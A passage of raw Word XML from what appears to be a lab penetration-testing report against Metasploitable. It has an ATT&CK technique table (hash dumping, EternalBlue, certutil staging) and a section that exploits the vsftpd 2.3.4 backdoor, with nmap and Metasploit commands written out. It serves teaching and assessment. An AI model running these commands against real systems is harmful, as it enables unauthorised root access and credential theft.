            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> — NT AUTHORITY\SYSTEM elevation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w14:paraId="1AE81F37" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="421" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D413E2D"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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AFB4539"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Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="149B9146"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T1003.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F20DDC2"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 xml:space="preserve">SAM database hash dump via Meterpreter </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>hashdump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w14:paraId="2DB3B398" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="421" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56023C3F"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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ECE30BA"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Lateral / Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0106B4ED" w14:textId="77777777" w:rsidR="00453791" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>T1110 /</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3730225E" w14:textId="57E18060" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> T1021.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CA33EF9"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 xml:space="preserve">Credential brute-force or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>EternalBlue</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> against Windows 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w14:paraId="33697B40" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="421" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61FD9F97"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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59E047BC"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Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C2CD602"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T1005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F1AD4FB"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Enumerate user directories and sensitive files on all targets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w14:paraId="69A20A6D" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="421" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70AA0676"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45C6D042"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Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77304353" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>T1036</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1193AEB5" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>LOLBin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> staging via certutil.exe; encoded Meterpreter payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5549F973"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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="46420AC5" w14:textId="669259B3" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4. Exploitation — Technical </w:t>
      </w:r>
      <w:r w:rsidR="00453791" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2518E17B" w14:textId="4E1A7355" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>4.1 Exploit A — vsftpd 2.3.4 Backdoor RCE (Metasploitable, T1190)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E2472E" w14:textId="77777777" w:rsidR="00FB20AD" w:rsidRPr="00C668B5" w:rsidRDefault="00FB20AD" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The vsftpd File transfer protocol daemon 2.3.4 also has a backdoor mechanism that was intentionally implanted with supply-chain attack of the official source distribution. Sending a username string with the byte sequence of the special character of the colon character) to the FTP service triggers the daemon to invoke a command shell with a root privileged ID and is bound to the TCP port of 6200, and this is a privilege allowing any remote unauthenticated principal to execute any command with the root account, but without the need of valid credentials. [6] Active reconnaissance was then started with the help of Nmap in order to enumerate open services and verify that the target host is running vulnerable vsftpd version:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B84A631" w14:textId="7FF18E05" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> -O -p- 192.168.174.130 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> metasploitable_scan.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28411C9D" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39740A7A" wp14:editId="33C2ACEF">
            <wp:extent cx="5943600" cy="3713480"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="13338071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807156" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3713480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA4283A" w14:textId="39C41464" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig. 3: </w:t>
      </w:r>
      <w:r w:rsidR="00FB20AD" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Nmap results indicate that port 21/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB20AD" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB20AD" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> is open and with vsftpd 2.3.4, which proves the relevance of CVE-2011-2523.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4773BDBA" w14:textId="4B1F7AE6" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00FB20AD" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Metasploit Framework module exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">/ftp/vsftpd_234_backdoor was then loaded and set up to attack the service that was found. On execution, the module sent the backdoor trigger sequence and opened an interactive root command shell session into the compromised host, which was shown by the response of the id system call to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>=0(root) argument. [7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BA25CE" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564C94FA" w14:textId="0573093C" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>192.168.174.130  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  set RPORT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>21  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FC278A" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E7112A8" wp14:editId="62E59BF5">
            <wp:extent cx="5943600" cy="3437890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="433792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3792072" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3437890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E85C87A" w14:textId="57A25F8E" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig. 4: </w:t>
      </w:r>
      <w:r w:rsidR="00FB20AD" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Metasploit console that found the exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB20AD" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB20AD" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234 backdoor RHOSTS and RPORT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14652CA9" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D9CF98C" wp14:editId="2A1E26C9">
            <wp:extent cx="5943600" cy="3444240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="51460318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4603189" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3444240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="086F0DE3" w14:textId="067CE7AE" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
